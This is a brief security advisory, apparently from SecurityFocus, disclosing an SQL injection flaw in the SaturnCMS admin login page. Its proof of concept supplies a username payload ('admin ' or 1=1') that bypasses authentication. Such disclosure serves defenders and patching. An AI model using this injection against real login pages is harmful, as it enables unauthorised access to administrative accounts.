SaturnCMS 'Username' Login Page SQL Injection Vulnerability

An attacker can use a browser to exploit this issue.

The following proof of concept is available:

http://www.example.com/admin

Username : admin ' or 1=1
Password : milw0rm


 

Privacy Statement
Copyright 2010, SecurityFocus